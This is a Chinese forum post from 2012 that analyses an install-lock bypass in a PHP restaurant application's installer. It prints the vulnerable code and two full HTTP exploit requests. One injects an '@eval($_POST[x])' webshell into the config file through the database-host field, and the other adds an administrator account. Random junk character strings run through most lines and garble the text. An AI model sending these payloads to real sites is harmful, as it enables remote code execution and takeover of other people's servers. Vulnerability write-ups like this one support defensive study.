问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。. a+ l) u) T& x% g7 ?2 S( F/ z
! P3 c+ |/ q4 ]) H! Q
<?php" O7 s) w! n" b) H% c4 m
if(file_exists("../install.lock"))
, y0 b [# ]7 N) x' h( p{' _+ i* ?4 n. ^; A8 y. k+ K
header("Location: ../");//没有退出
" P5 S: h; j* i' z( j( \}
1 d2 W' ^- F$ p) [
) n x7 W5 C' h, a k//echo 'tst';exit;% {* S; h K+ Q: ] Q* b
require_once("init.php");
+ U7 f9 \; B5 Q1 kif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
/ [$ |, f* P& p, L{
8 W& l8 d; S$ W- x$ ?可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。2 M5 p3 d8 W ~: X/ v* b8 G2 [
: V4 e# x3 c, W I& i: [1、getshell(很危险)
. g' o# Q+ F9 @/ tif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
! J T. g c2 H! ~4 c+ _0 `{
9 q3 h7 r' }. K9 \$ b" q8 w" e. A$smarty->assign("step",1);
+ x4 H) p7 x. z0 n7 @, J3 \$smarty->display("index.html");
" T4 a" C0 }$ G) r- W}elseif($_REQUEST['step']==2)2 N( j* ^6 v8 R4 y6 ^
{
5 ^/ | W! s+ m* f% Q $mysql_host=trim($_POST['mysql_host']);
- s7 K: q) |1 h' p, O, m( U $mysql_user=trim($_POST['mysql_user']);
" o1 Q. P, y9 X& e( _ $mysql_pwd=trim($_POST['mysql_pwd']);
u: s- s6 N- J, Y( H8 M: L $mysql_db=trim($_POST['mysql_db']);
. u" a1 P3 e) d( Q& k' q $tblpre=trim($_POST['tblpre']);
1 K9 L6 u( @( N" G4 a& { $domain==trim($_POST['domain']);
~* W) g4 ~$ a0 C* T2 y& ` $str="<?php \r\n";: c# b0 i" N" q: H
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";( O% H: i1 K/ E9 ]& e0 x/ @3 d
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n"; {! p+ o# B8 t7 h/ I K
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";* f& K/ C( K P* e" I( v
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
, _/ o y; B4 u1 ?$ L $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
t" b# V2 J0 o' T+ X7 Y $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";0 Z( T8 i! F4 g6 `& V5 U
$str.='define("DOMAIN","'.$domain.'");'."\r\n";
3 P/ M! ]% P# s. e- ~ $str.='define("SKINS","default");'."\r\n";& A- u! U7 \ ]! i4 j% {
$str.='?>';
8 ^+ P$ S+ _7 E8 d Q, U2 I5 M; @ file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
: z6 I3 j. N5 m; M5 k上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马% |7 \- W: W% o1 o0 G
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
) [+ w) g6 q& R5 q& CHost: 192.168.80.129# @" b* O7 T3 H4 c. v$ y) N. L
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0" D6 N* C' s& s+ ^! r4 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8& Y$ t/ ?+ K5 T. T, w& r
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
( \. S! c) N. F0 P( VAccept-Encoding: gzip, deflate
. O9 b) R# K1 E- K/ h! i$ M# gReferer: http://192.168.80.129/canting/install/index.php?step=1
# b5 {3 G; T c" x( q% _" K( \2 a& ^Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
& G9 G- E M, X' h6 G u3 EContent-Type: application/x-www-form-urlencoded1 E @9 a1 f" d% l# f' P: l: `/ b
Content-Length: 126
8 s. n0 y5 j8 c: B* f+ c" m. f 9 z, `; o; c( o" O- H1 S
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
, q8 t3 n z% H4 C' l* L5 A但是这个方法很危险,将导致网站无法运行。
/ G; x' |' x9 c+ N7 d
6 s. |$ Q9 ~9 Q5 X3 H- N& R& l2 E2、直接添加管理员! p9 ^1 ~& } r& |' i# |" ?
9 C0 x$ r1 M6 P
elseif($_REQUEST['step']==5)
2 c" a% Z& g5 I7 Q4 u{
( ~+ r, u, j& \9 f3 a if($_POST)
! A5 G4 @" t% X { require_once("../config/config.inc.php");+ N$ e, F9 V# l& q) N3 |
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);8 ^# D5 F r: Q7 ]$ ]- U
mysql_select_db(MYSQL_DB,$link);
3 r6 K; c& c. p mysql_query("SET NAMES ".MYSQL_CHARSET );4 k* w" u2 U' U# U1 _+ s6 ]
mysql_query("SET sql_mode=''");
$ l! v3 z+ I# C. X; c' q8 r+ v
! e1 `! K1 @ Q! {! N1 K$ C $adminname=trim($_POST['adminname']);
# E9 t8 j7 q M, y* L: F7 P9 I |- h $pwd1=trim($_POST['pwd1']);
' r: L7 o: X6 [ $pwd2=trim($_POST['pwd2']);
! g7 h' M0 Z1 g( O8 x" j, B if(empty($adminname))8 B1 T/ j- F2 f! n0 E* S
{
0 w0 \, |; y8 l* y" M& ?
0 I6 F. o, t% X- |% N& V9 ` echo "<script>alert('管理员不能为空');history.go(-1);</script>";9 Q. W; U- o2 I$ S
exit();
6 Y; `! l1 s/ m" v* z; |! O% J* n2 I }2 c6 [) m/ ?1 Z$ t
if(($pwd1!=$pwd2) or empty($pwd1))0 L7 O2 ~! \0 ], T
{4 E) I& H0 h4 |3 y$ w
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出' \9 ]3 Y4 D* c8 |/ M+ {% M
}/ l6 @- E3 V& i; \' b. _+ t6 Q
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
6 L; A" B, E" h5 U }
2 U! ~1 j: w' v2 D& {( f这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:( m8 x% k Y( f$ c, X: r
POST /canting/install/index.php?m=index&step=5 HTTP/1.1; V( X; h8 q: G- \
Host: 192.168.80.129
y6 t1 z- r) N3 NUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0' F. H$ |% n( t$ O8 O. h5 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8% Y0 U# T: L* z3 ^/ E
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.34 |! n/ L( d+ ]+ X* `* r
Accept-Encoding: gzip, deflate7 y$ E& L* j6 N8 ^$ l" D) p- w
Referer: http://www.2cto.com /canting/install/index.php?step=1
, o: Y( v; h( O. a5 X% ]% O+ ECookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
3 i A K9 r& \( w& }" GContent-Type: application/x-www-form-urlencoded
/ J/ Y4 x. T" n+ ]$ f8 `Content-Length: 46" |* D& m1 l' N1 [3 Y; F
5 [ [' g! L( V6 V0 G5 _adminname=qingshen&pwd1=qingshen&pwd2=qingshen' w& b: q1 B' Y" \5 O, o- q( I
|
发表于 2012-12-4 11:13:44
收藏
支持
反对